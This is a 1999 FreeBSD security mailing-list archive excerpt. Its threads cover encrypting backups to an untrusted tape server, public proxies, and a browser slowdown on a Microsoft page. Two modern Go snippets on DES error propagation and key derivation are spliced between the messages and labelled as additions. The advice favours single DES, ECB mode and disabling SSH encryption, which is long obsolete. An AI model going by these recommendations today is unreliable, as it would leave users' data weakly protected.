> > Transport the data stream to the server using ssh -c none (no need for the > > overhead of another encryption layer unless you're really paranoid) > > Just being cautious is enough. Adding a layer of SSH encryption will at > least thwart offline dictionary attacks on the backup passphrase. > Encryption is cheap, why disable it if you don't have to? If you use a random passphrase as in my suggestion then dictionary attacks are worthless and you're only vulnerable to an (expensive) brute force keyspace search. Encrypting the already encrypted stream doesn't buy you anything I can see, except the extra CPU time. But it's not a big deal. Kris > > Cheers, > Jeroen > -- > Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE > ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:38:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 8374914F8E for ; Mon, 17 May 1999 06:38:26 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA26566; Mon, 17 May 1999 23:08:25 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA23054; Mon, 17 May 1999 23:09:13 +0930 Date: Mon, 17 May 1999 23:09:09 +0930 (CST)
From: Kris Kennaway X-Sender: kkennawa@bragg To: Adam Shostack Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <19990517093143.B2322@weathership.homeport.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Adam Shostack wrote: > If the tape is unreliable, and you lose a few bits of a plaintext > file, you've lost a few bits. If it's a few bits of an encrypted and > compressed file, you may lose the whole file. Yes, but the question is whether tapes do this at all. The normal use of a backup tape (preserving a perfect copy of everything you send to it) is ruined if tapes are dropping bits - I don't think you'd see this unless your hardware was bad, in which case any relatively lightweight encoding method is likely to be in trouble too. The best you could do to guard against this would be to either run your encrypted data stream through an error-correcting code filter (I don't know of any tools which can do this, but it's not hard to write), or break up your input into blocks and encrypt them separately (or use the DES ECB mode). > | ther server and modify it to nullify ANY authentication measures (easy if this > | is a shell script) - so you can't really be sure that no-one else is writing > | data onto the tape, only that the data you do write which ends up on the tape > | is secure from decryption. > > No, if you use pgp, you can sign the data on your local (trusted) > machine, and only be vulnerable to a DOS attack, not authentication > attacks. I was talking about authentication for access to the tape server process itself (preventing other people from writing onto your tape).
You're correct about PGP - it's probably better to use PGP instead of bdes (or equivalent symmetric encryption filter) for this reason - verification that your data stream was read back intact (and assuming perfect retrieval, was stored intact) when you restore. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:43: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 666D015094 for ; Mon, 17 May 1999 06:43:03 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:48914 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8063-32304>; Mon, 17 May 1999 15:42:53 +0200 Message-ID: <37401CDF.CEFA8B53@vangelderen.org> Date: Mon, 17 May 1999 15:42:55 +0200 
From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > PGP provides a password based encryption mode, just use that, you will > > still benefit from PGPs compression and checksumming facilities. > > Didn't know that. What cipher does it use? This feature has been available since PGP's early days. It uses PGP's default symmetric cipher. > > > Pass the data through three > > > rounds of bdes doing an encrypt, decrypt, followed by encrypt (with different > > > keys, of course) and you've got yourself 3DES, which bdes doesn't seem to do > > > natively. Make the keys random, and stick those in a PGP file if you like. > > > > If you assume PGP is available, why not just use it? Using bdes(1) in > > this setup sounds way more complicated (thus error-prone) to me. > > There's no /need/ to use PGP in this step - clearly you could do anything you > like with the local keys, such as printing them out, or storing them as > plaintext (or keeping a constant key used for multiple backups). I realize that. But using bdes(1) when you have PGP available is not a very good idea. Using bdes(1) actually never is a good idea because of its crappy key handling (no hashing). bdes(1) allows you to shoot yourself in the foot without you realizing it. > > > Transport the data stream to the server using ssh -c none (no need for the > > > overhead of another encryption layer unless you're really paranoid) > > > > Just being cautious is enough. Adding a layer of SSH encryption will at > > least thwart offline dictionary attacks on the backup passphrase. > > Encryption is cheap, why disable it if you don't have to?
> > If you use a random passphrase as in my suggestion then dictionary attacks are > worthless and you're only vulnerable to an (expensive) brute force keyspace > search. Encrypting the already encrypted stream doesn't buy you anything I can > see, except the extra CPU time. But it's not a big deal. Uhm, a dose of reality here: how many people will pick random passphrases of sufficient length? There is almost never reason to disable SSH encryption. Cheers, Jeroen -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:57:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 273F9153B9 for ; Mon, 17 May 1999 06:57:07 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id HAA10030; Mon, 17 May 1999 07:57:04 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3740202F.347223FA@softweyr.com> Date: Mon, 17 May 1999 07:57:03 -0600 
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Kiril Mitev Cc: freebsd-security@FreeBSD.ORG Subject: Re: network scan? References: <199905171304.OAA01246@idea.co.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kiril Mitev wrote: > > > Wes Peters wrote: > > > > Harold Gutch wrote: > > > > > > Just to make sure I'm getting this right - you're saying China > > > has a censored internet gateway (i.e. blocking *something* [what > > > exactly ?] ), but they do allow connections to ports 1080, 3128 > > > and 8080 ? > > > > They block access to sites, not to ports. In particular, sites that > > carry capitalist misinformation, or what we in the free world call > > "news." > > Hmm, but who can tell where EXACTLY *they* are trying to go to ? As in, > can you see things like 'www.abc.com' and such ? Or is it more > along the lines of www.max-XXX.org - you get the idea ? Not unless you have a proxy up, no. But I do see where you're going. My response *must* be "Get your mind out of the gutter (so mine can float by.)" ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 6:59:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from weathership.homeport.org (breakwater.homeport.org [216.67.13.2]) by hub.freebsd.org (Postfix) with ESMTP id 4F014152CE for ; Mon, 17 May 1999 06:59:32 -0700 (PDT) (envelope-from adam@weathership.homeport.org) Received: (from adam@localhost) by weathership.homeport.org (8.8.8/8.8.5) id KAA02583; Mon, 17 May 1999 10:12:52 -0400 (EDT) Date: Mon, 17 May 1999 10:12:52 -0400
From: Adam Shostack To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup Message-ID: <19990517101251.A2526@weathership.homeport.org> References: <19990517093143.B2322@weathership.homeport.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.3i In-Reply-To: ; from Kris Kennaway on Mon, May 17, 1999 at 11:09:09PM +0930 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, May 17, 1999 at 11:09:09PM +0930, Kris Kennaway wrote: | On Mon, 17 May 1999, Adam Shostack wrote: | | > If the tape is unreliable, and you lose a few bits of a plaintext | > file, you've lost a few bits. If it's a few bits of an encrypted and | > compressed file, you may lose the whole file. | | Yes, but the question is whether tapes do this at all. The normal use of a | backup tape (preserving a perfect copy of everything you send to it) is ruined | if tapes are dropping bits - I don't think you'd see this unless | your hardware was bad, in which case any relatively lightweight | encoding method is likely to be in trouble too. The other way this can happen is over extended (5-10 years) time periods; if you're planning to have your backups have a shelf life of N years, you may want to worry about tape degradation. | The best you could do to guard against this would be to either run your | encrypted data stream through an error-correcting code filter (I | don't know of | any tools which can do this, but it's not hard to write), or break up your | input into blocks and encrypt them separately (or use the DES ECB mode). There are better ways to get error recovery than ECB mode ciphers; CBC will recover from errors with a few blocks of lossage. My concern would be if you lose bits in the message headers, your ability to decrypt may disappear entirely. Adam -- "It is seldom that liberty of any kind is lost all at once."
-Hume To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7: 2:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from adelphi.physics.adelaide.edu.au (adelphi.physics.adelaide.edu.au [129.127.36.247]) by hub.freebsd.org (Postfix) with ESMTP id 93C4D1522D for ; Mon, 17 May 1999 07:02:48 -0700 (PDT) (envelope-from kkennawa@physics.adelaide.edu.au) Received: from bragg (bragg [129.127.36.34]) by adelphi.physics.adelaide.edu.au (8.8.8/8.8.8/UofA-1.5) with SMTP id XAA26602; Mon, 17 May 1999 23:32:47 +0930 (CST) Received: from localhost by bragg; (5.65/1.1.8.2/05Aug95-0227PM) id AA07121; Mon, 17 May 1999 23:33:36 +0930 Date: Mon, 17 May 1999 23:33:34 +0930 (CST) 
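The error-propagation question Kris and Adam argue above (ECB versus CBC when a stored bit goes bad), together with Kris's earlier encrypt-decrypt-encrypt construction of 3DES from three single-DES passes, as an added example that is not code from the thread. It uses Go's standard crypto/des; the key, IV, plaintext and the position of the flipped bit are constructed sample values.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"fmt"
	"math/bits"
)

// desBlocks encrypts or decrypts whole 8-byte blocks with single DES,
// in CBC mode (cbc=true) or ECB mode (cbc=false).
func desBlocks(key, iv, in []byte, cbc, encrypt bool) ([]byte, error) {
	blk, err := des.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(in))
	if cbc {
		var mode cipher.BlockMode
		if encrypt {
			mode = cipher.NewCBCEncrypter(blk, iv)
		} else {
			mode = cipher.NewCBCDecrypter(blk, iv)
		}
		mode.CryptBlocks(out, in)
		return out, nil
	}
	for i := 0; i+8 <= len(in); i += 8 {
		if encrypt {
			blk.Encrypt(out[i:i+8], in[i:i+8])
		} else {
			blk.Decrypt(out[i:i+8], in[i:i+8])
		}
	}
	return out, nil
}

// BitFlipDamage encrypts plaintext, flips one bit in ciphertext block hit
// (one bad bit read back from tape), decrypts, and returns how many plaintext
// bits differ in each block. ECB garbles block hit only; CBC garbles block hit
// and flips exactly one bit of block hit+1, then resynchronises.
func BitFlipDamage(key, iv, plaintext []byte, hit int, cbc bool) ([]int, error) {
	ct, err := desBlocks(key, iv, plaintext, cbc, true)
	if err != nil {
		return nil, err
	}
	ct[hit*8] ^= 0x80 // the simulated storage error
	got, err := desBlocks(key, iv, ct, cbc, false)
	if err != nil {
		return nil, err
	}
	damage := make([]int, len(plaintext)/8)
	for b := range damage {
		for i := b * 8; i < b*8+8; i++ {
			damage[b] += bits.OnesCount8(plaintext[i] ^ got[i])
		}
	}
	return damage, nil
}

// EDEMatchesTripleDES checks Kris's construction on one block: encrypt with
// k1, decrypt with k2, encrypt with k3 equals crypto/des TripleDES keyed with
// k1||k2||k3. The identity is per block; three chained CBC passes are not
// the same thing as 3DES run in CBC mode.
func EDEMatchesTripleDES(k1, k2, k3, block []byte) (bool, error) {
	var cs [3]cipher.Block
	for i, k := range [][]byte{k1, k2, k3} {
		c, err := des.NewCipher(k)
		if err != nil {
			return false, err
		}
		cs[i] = c
	}
	ede := make([]byte, 8)
	cs[0].Encrypt(ede, block)
	cs[1].Decrypt(ede, ede)
	cs[2].Encrypt(ede, ede)
	tdes, err := des.NewTripleDESCipher(append(append(append([]byte{}, k1...), k2...), k3...))
	if err != nil {
		return false, err
	}
	want := make([]byte, 8)
	tdes.Encrypt(want, block)
	return bytes.Equal(ede, want), nil
}

func main() {
	key, iv := []byte("8bytekey"), []byte("initvect") // constructed sample values
	pt := []byte("0123456789abcdef0123456789abcdef")  // four 8-byte blocks
	ecb, _ := BitFlipDamage(key, iv, pt, 1, false)
	cbc, _ := BitFlipDamage(key, iv, pt, 1, true)
	fmt.Println("bits damaged per block, ECB:", ecb, "CBC:", cbc)
	ok, _ := EDEMatchesTripleDES([]byte("key-one!"), []byte("key-two!"), []byte("key-3333"), []byte("blockOne"))
	fmt.Println("E-D-E with three keys equals TripleDES:", ok)
}
```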
From: Kris Kennaway X-Sender: kkennawa@bragg To: "Jeroen C. van Gelderen" Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup In-Reply-To: <37401CDF.CEFA8B53@vangelderen.org> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > This feature has been available since PGP's early days. It uses PGP's > default symmetric cipher. Which is what? I don't have PGP handy here.. > > > If you assume PGP is available, why not just use it? Using bdes(1) in > > > this setup sounds way more complicated (thus error-prone) to me. > > > > There's no /need/ to use PGP in this step - clearly you could do anything you > > like with the local keys, such as printing them out, or storing them as > > plaintext (or keeping a constant key used for multiple backups). > > I realize that. But using bdes(1) when you have PGP available is not a > very good idea. Using bdes(1) actually never is a good idea because of > its crappy key handling (no hashing). bdes(1) allows you to shoot > yourself in the foot without you realizing it. Can you elaborate on this? Apart from the fact that bdes expects keys to be given on the command line for non-interactive use (and not taken from a file, which should be an easy hack to make), what's wrong with it? > > If you use a random passphrase as in my suggestion then dictionary attacks are > > worthless and you're only vulnerable to an (expensive) brute force keyspace > > search. Encrypting the already encrypted stream doesn't buy you anything I can > > see, except the extra CPU time. But it's not a big deal. > > Uhm, a dose of reality here: how many people will pick random > passphrases of sufficient length? There is almost never reason to > disable SSH encryption. Yes, but the original problem related to a non-interactive tape backup.
There is no reason to have the encryption key as a human-memorable phrase; on the contrary it's much better to make it a machine-generated random string of the sufficient length. Kris ----- "That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye" "Wow, that's sharp!" - Ace Rimmer and the Cat, _Red Dwarf_ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:15:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id EBF7D14BE2 for ; Mon, 17 May 1999 07:15:33 -0700 (PDT) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1356 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 17 May 1999 08:56:10 -0500 (CDT) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Mon, 17 May 1999 08:55:55 -0500 (CDT) 
From: James Wyatt To: Ludwig Pummer Cc: Wes Peters , freebsd-security@FreeBSD.ORG Subject: Re: warning concerning a public proxy [was Re: network scan?] In-Reply-To: <4.1.19990516173306.00a7fa20@mail-r> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 16 May 1999, Ludwig Pummer wrote: [ ... ] > Setting up a public proxy might feel real good, but it won't any more after > @Home cancels your account. Worse than that: when they disconnect you, your install fees are kept and you have useless hardware worth less than you paid. With xDSL you can usually switch to another ISP. I know of several folks who left the ISP I worked for, did something that hacked-off (not hacked 8{) the @home admins, and came back rather quickly. Typically it's a Quake server or a small FTP server for their digital camera pictures for relatives. One was a warez/MP3 site and we wouldn't like those either when the lawyers visited. Have fun... - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:16:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 7870715540 for ; Mon, 17 May 1999 07:16:48 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (homer.softweyr.com [204.68.178.39]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id IAA10086; Mon, 17 May 1999 08:16:33 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <374024BF.3EAD1892@softweyr.com> Date: Mon, 17 May 1999 08:16:31 -0600
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: nr1@ihug.co.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: <199905170014.MAA18766@smtp1.ihug.co.nz> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nr1@ihug.co.nz wrote: > > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. Can Amanda help with something like this? Perhaps if you fed it an encryption program instead of a compression program? Does Amanda have the ability to encrypt files as they are backed up? -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:23:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from schuimpje.snt.utwente.nl (schuimpje.snt.utwente.nl [130.89.238.4]) by hub.freebsd.org (Postfix) with ESMTP id 7515815469 for ; Mon, 17 May 1999 07:23:28 -0700 (PDT) (envelope-from jeroen@vangelderen.org) Received: from wit395301.student.utwente.nl ([130.89.235.121]:32787 "EHLO vangelderen.org" ident: "NO-IDENT-SERVICE[2]") by schuimpje.snt.utwente.nl with ESMTP id <8068-32302>; Mon, 17 May 1999 16:23:14 +0200 Message-ID: <37402654.EE74B389@vangelderen.org> Date: Mon, 17 May 1999 16:23:16 +0200 
From: "Jeroen C. van Gelderen" X-Mailer: Mozilla 4.51 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Adam Shostack , nr1@ihug.co.nz, freebsd-security@FreeBSD.ORG Subject: Re: secure backup References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Mon, 17 May 1999, Jeroen C. van Gelderen wrote: > > > This feature has been available since PGP's early days. It > > uses PGP's default symmetric cipher. > > Which is what? I don't have PGP handy here.. IIRC IDEA for the 2.x series. CAST5 (default), TripleDES or IDEA for the 5.x/6.x versions. > > I realize that. But using bdes(1) when you have PGP available is not a > > very good idea. Using bdes(1) actually never is a good idea because of > > it's crappy key handling (no hashing). bdes(1) allows you to shoot > > yourself in the foot without you realizing it. > > Can you elaborate on this? Apart from the fact that bdes expects keys to be > given on the command line for non-interactive use (and not taken from a file, > which should be an easy hack to make), what's wrong with it? The problem is the people that use it: they pick non-random passwords. If you are *very* lucky, a password has 6 bits of entropy per character, you can only enter 8 characters -> 48 bits. This assumes a random distribution over 64 characters, quite unlikely. One (partial) solution is to accept longer passphrases, hashing them down to 56 bits of DES key. If you use a cryptographically strong hash function (SHA-1) it will preserve the entropy from the given password. Another advantage of this approach is that you can introduce salt and/or multiple hashing to slow down brute force attacks. And -chances are small but not non-existent- it is possible to choose DES weak keys, something that PGP automatically avoids for you. 
PGP delivers all these 'advanced' techniques in a reputable program. So you'd better benefit from all the expertise that's been put into PGP than invent yourself a scheme. > > > If you use a random passphrase as in my suggestion then dictionary attacks are > > > worthless and you're only vulnerable to an (expensive) brute force keyspace > > > search. Encrypting the already encrypted stream doesn't buy you anything I can > > > see, except the extra CPU time. But it's not a big deal. > > > > Uhm, a dose of reality here: how many people will pick random > > passphrases of sufficient length? There is almost never reason to > > disable SSH encryption. > > Yes, but the original problem related to a non-interactive tape backup. There > is no reason to have the encryption key as a human-memorable phrase; on the > contrary it's much better to make it a machine-generated random string of the > sufficient length. How many people do this? You will have to restore the backup at some point in the future. And at that point in time, access to the vault (where the paper with the passwords is) may not be available. There's a subtle difference between theory and practice here. Cheers, Jeroen PS. s/PGP/GnuPG/ if you want. -- Jeroen C. van Gelderen - jeroen@vangelderen.org - 0xC33EDFDE To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 17 7:33:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [199.108.85.50]) by hub.freebsd.org (Postfix) with ESMTP id 767B314F4C for ; Mon, 17 May 1999 07:33:35 -0700 (PDT) (envelope-from sendmail@roble.com) Received: from roble2.roble.com (roble2.roble.com [199.108.85.52]) by roble.com (Roble1b) with SMTP id HAA14552 for ; Mon, 17 May 1999 07:33:36 -0700 (PDT) Date: Mon, 17 May 1999 07:33:33 -0700 (PDT) 
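Jeroen's hashed-passphrase scheme above (a passphrase of any length, a salt, repeated SHA-1, odd parity, weak-key avoidance) beside the unhashed 8-character key he warns about, as an added illustration that is not code from the thread, from bdes(1) or from PGP. The salt, passphrases and iteration count are constructed sample values; the weak-key table holds the 16 DES weak and semi-weak keys from FIPS 74.

```go
package main

import (
	"bytes"
	"crypto/sha1"
	"errors"
	"fmt"
	"math/bits"
)

// DES weak and semi-weak keys in odd-parity form (the values tabulated in
// FIPS 74). A derived key that lands on one of these must be rejected.
var desWeakKeys = [][]byte{
	{0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01},
	{0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE, 0xFE},
	{0xE0, 0xE0, 0xE0, 0xE0, 0xF1, 0xF1, 0xF1, 0xF1},
	{0x1F, 0x1F, 0x1F, 0x1F, 0x0E, 0x0E, 0x0E, 0x0E},
	{0x01, 0x1F, 0x01, 0x1F, 0x01, 0x0E, 0x01, 0x0E},
	{0x1F, 0x01, 0x1F, 0x01, 0x0E, 0x01, 0x0E, 0x01},
	{0x01, 0xE0, 0x01, 0xE0, 0x01, 0xF1, 0x01, 0xF1},
	{0xE0, 0x01, 0xE0, 0x01, 0xF1, 0x01, 0xF1, 0x01},
	{0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE},
	{0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01, 0xFE, 0x01},
	{0x1F, 0xE0, 0x1F, 0xE0, 0x0E, 0xF1, 0x0E, 0xF1},
	{0xE0, 0x1F, 0xE0, 0x1F, 0xF1, 0x0E, 0xF1, 0x0E},
	{0x1F, 0xFE, 0x1F, 0xFE, 0x0E, 0xFE, 0x0E, 0xFE},
	{0xFE, 0x1F, 0xFE, 0x1F, 0xFE, 0x0E, 0xFE, 0x0E},
	{0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1, 0xFE},
	{0xFE, 0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1},
}

// RawASCIIKey models an unhashed key: the first eight characters of the
// passphrase are the key and everything after them is silently ignored, so
// at most 8 characters (Jeroen's "48 bits if you are very lucky") count.
func RawASCIIKey(passphrase string) []byte {
	key := make([]byte, 8)
	copy(key, passphrase)
	return key
}

// setOddParity sets the low bit of each byte so the byte has odd parity,
// the form in which DES carries its 56 key bits in 64.
func setOddParity(k []byte) []byte {
	out := make([]byte, len(k))
	for i, b := range k {
		b &^= 1
		if bits.OnesCount8(b)%2 == 0 {
			b |= 1
		}
		out[i] = b
	}
	return out
}

// IsWeakDESKey reports whether an odd-parity key is a DES weak or semi-weak key.
func IsWeakDESKey(k []byte) bool {
	for _, w := range desWeakKeys {
		if bytes.Equal(w, k) {
			return true
		}
	}
	return false
}

// DeriveDESKey hashes a passphrase of any length, together with a per-backup
// salt, down to a 56-bit DES key. SHA-1 carries the passphrase's entropy
// through (up to the 56 bits the key can hold), the salt defeats precomputed
// tables shared across backups, and iterating the hash makes each brute-force
// guess cost `iterations` hashes instead of one.
func DeriveDESKey(passphrase string, salt []byte, iterations int) ([]byte, error) {
	if len(salt) == 0 || iterations < 1 {
		return nil, errors.New("need a non-empty salt and at least one iteration")
	}
	buf := append(append([]byte{}, salt...), passphrase...)
	h := sha1.Sum(buf)
	for i := 1; i < iterations; i++ {
		buf = append(append(buf[:0], h[:]...), salt...)
		h = sha1.Sum(buf)
	}
	key := setOddParity(h[:8])
	if IsWeakDESKey(key) {
		return nil, errors.New("derived key is a DES weak key; choose a fresh salt")
	}
	return key, nil
}

func main() {
	// Constructed sample inputs. Two passphrases that agree in their first
	// eight characters collide as raw keys but not as hashed keys.
	salt := []byte("tape-1999-05-17")
	for _, p := range []string{"correct horse battery", "correct horse staple"} {
		k, err := DeriveDESKey(p, salt, 1000)
		fmt.Printf("%-24q raw=%x hashed=%x err=%v\n", p, RawASCIIKey(p), k, err)
	}
}
```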
From: Roger Marquis
X-Sender: Roger Marquis
Reply-To: Roger Marquis
To: security@FreeBSD.ORG
Subject: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp)

Has anyone attempted to browse:

  http://microsoft.com/NTServer/all/Downloads.asp

using Netscape Navigator and noticed what seems to be an HTML denial of
service? I've tested this page with Javascript on and off, Java on and
off, cookies on and off, stylesheets off, under FreeBSD, Linux and
Solaris and the behavior is consistent:

 * Navigator freezes for several seconds
 * CPU utilization climbs briefly to near 100%
 * memory usage climbs by 11MB
 * the 11MB of memory are not released even after leaving the page and
   clearing disk and RAM caches.

The page shows two possible sources for this extremely unusual browser
behavior: Using lynx to download the jscripts.js and Netscape.css
scripts there is, as expected, a good deal of browser-specific code.
Is there a csslint or javascript debugging utility which might identify
this Unix-Netscape specific problem?

-- 
Roger Marquis
Roble Systems Consulting
http://www.roble.com/

From owner-freebsd-security Mon May 17 8: 3:33 1999
Received: from trooper.velocet.ca (trooper.velocet.net [209.167.225.226]) by hub.freebsd.org (Postfix) with ESMTP id 412FB14E96 for ; Mon, 17 May 1999 08:03:26 -0700 (PDT) (envelope-from dgilbert@trooper.velocet.ca)
Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id LAA07870; Mon, 17 May 1999 11:03:14 -0400 (EDT)
From: David Gilbert
Message-ID: <14144.12209.672779.906741@trooper.velocet.ca>
Date: Mon, 17 May 1999 11:03:13 -0400 (EDT)
To: Roger Marquis
Cc: security@FreeBSD.ORG
Subject: HTML DOS? (http://microsoft.com/NTServer/all/Downloads.asp)
X-Mailer: VM 6.71 under 20.4 "Emerald" XEmacs Lucid

>>>>> "Roger" == Roger Marquis writes:

Roger> Has anyone attempted to browse:
Roger> http://microsoft.com/NTServer/all/Downloads.asp

My machine definitely takes a few seconds to render the page, and I
never have javascript on. One thing to note is that you *can't* turn
javascript off in Netscape 4.5 (even if you think you did). I've got
the linux 4.51 netscape on FreeBSD-3.0

Dave.

-- 
============================================================================
|David Gilbert, Velocet Communications.  | Two things can only be          |
|Mail: dgilbert@velocet.net              | equal if and only if they       |
|http://www.velocet.net/~dgilbert        | are precisely opposite.         |
=========================================================GLO================

From owner-freebsd-security Mon May 17 10:38:52 1999
Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 6A90114D92 for ; Mon, 17 May 1999 10:38:44 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu)
Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.8.8+Sun/SMI-SVR4) id TAA00614; Mon, 17 May 1999 19:38:29 +0200 (MET DST)
Received: from sziszi by petra.hos.u-szeged.hu with local-smtp (Exim 2.05 #1 (Debian)) id 10jRVq-0000o8-00; Mon, 17 May 1999 19:49:14 +0200
Date: Mon, 17 May 1999 19:49:14 +0200 (CEST)
From: Adam Szilveszter
Reply-To: Adam Szilveszter
To: Roger Marquis
Cc: security@FreeBSD.ORG
